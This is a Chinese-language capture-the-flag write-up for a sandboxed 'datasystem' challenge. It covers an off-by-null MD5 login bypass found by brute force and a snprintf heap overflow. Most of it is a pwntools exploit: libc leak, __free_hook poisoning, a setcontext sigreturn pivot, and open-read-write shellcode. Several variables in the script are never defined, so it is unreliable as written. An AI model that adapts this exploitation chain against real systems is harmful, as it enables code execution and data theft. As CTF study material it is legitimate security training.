开了沙箱。
看到两个特征数的时候显然知道是md5了,密码需要md5.
在我们输入0x20个字符的时候这里会有一个off by null。会把密码的最后要比较的mf5的第一个字节覆盖成’\x00’.
有一个off by null的漏洞。
所以导致我们如果输入的md5第一个字节可以最后是’\x00’,那么将会直接绕过检查。
所以我们就爆破一下。
import hashlib
import string
import itertools
target_c = '00'
for i in range(8):
print(i)
for mes in itertools.product(string.ascii_letters, repeat=i):
if hashlib.md5((''.join(mes)).encode()).hexdigest().startswith(target_c):
print(''.join(mes))
exit()
最后发现输入gB就可以了。
进入堆部分
add可以直接溢出。
snprintf试图写入0x500个字符,但是不允许,所以v3会直接变成0x500,就可以直接溢出。
exp
from pwn import*
context.log_level='debug'
context.arch='amd64'
context.os = "linux"
context.terminal = ["tmux", "splitw", "-h"]
local = 1
if local:
r = process('./datasystem')
else:
r = remote("node4.buuoj.cn", 25963)
sa = lambda s,n : r.sendafter(s,n)
sla = lambda s,n : r.sendlineafter(s,n)
sl = lambda s : r.sendline(s)
sd = lambda s : r.send(s)
rc = lambda n : r.recv(n)
ru = lambda s : r.recvuntil(s)
ti = lambda: r.interactive()
lg = lambda name,addr :log.success(name+":"+hex(addr))
def debug():
gdb.attach(r)
pause()
sa("please input username: ", "admin")
sa("please input password: ", "gB" + '\x00' * 0x1e)
menu = ">> :"
def add(size, content):
sla(menu, str(_add))
sla("Size:", str(size))
sa("Content:", content)
def edit(idx, content):
sla(menu, str(_edit))
sla("Index:", str(idx))
sa("Content:", content)
def free(idx):
sla(menu, str(_free))
sla("Index:", str(idx))
def show(idx):
sla(menu, str(_show))
sla("Index:", str(idx))
add(0x10, 'a' * 0x10)
add(0x430, 'a')
add(0x10, 'a')
free(1)
free(0)
add(0x10, 0x20 * 'a')
show(0)
malloc_hook = (u64(ru('\x7f')[-6:] + '\x00\x00') & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF)
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym["__free_hook"]
system_addr = libc_base + libc.sym["system"]
setcontext_door = libc_base + libc.sym['setcontext'] + 53
lg("libc_base", libc_base)
free(0)
add(0x10, 0x10 * 'a' + p64(0) + p64(0x441))
add(0x40, 'a')
add(0x40, 'a')
add(0x40, 'a')
free(4)
free(3)
free(1)
add(0x40, 0x40 * 'a' + p64(0) + p64(0x51) + p64(__free_hook)) # 1
fake_rsp = free_hook & 0xfffffffffffff000
frame = SigreturnFrame()
frame.rax = 0
frame.rdi = 0
frame.rsi = fake_rsp
frame.rdx = 0x2000
frame.rsp = fake_rsp
frame.rip = syscall
add(0x40, 'a') # 3
add(0x40, p64(setcontext_door)) # 4
add(len(str(frame)), str(frame)) # 5
free(5)
layout = [
libc_base+libc.search(asm("pop rdi\nret")).next(),
free_hook & 0xfffffffffffff000,
libc_base+libc.search(asm("pop rsi\nret")).next(),
0x2000,
libc_base+libc.search(asm("pop rdx\nret")).next(),
7,
libc_base+libc.search(asm("pop rax\nret")).next(),
10,
syscall,
libc_base+libc.search(asm("jmp rsp")).next(),
]
shellcode = asm('''
sub rsp, 0x800
push 0x67616c66
mov rdi, rsp
xor esi, esi
mov eax, 2
syscall
cmp eax, 0
js failed
mov edi, eax
mov rsi, rsp
mov edx, 0x100
xor eax, eax
syscall
mov edx, eax
mov rsi, rsp
mov edi, 1
mov eax, edi
syscall
jmp exit
failed:
push 0x6c696166
mov edi, 1
mov rsi, rsp
mov edx, 4
mov eax, edi
syscall
exit:
xor edi, edi
mov eax, 231
syscall
''')
sd(flat(layout) + shellcode)
r.interactive()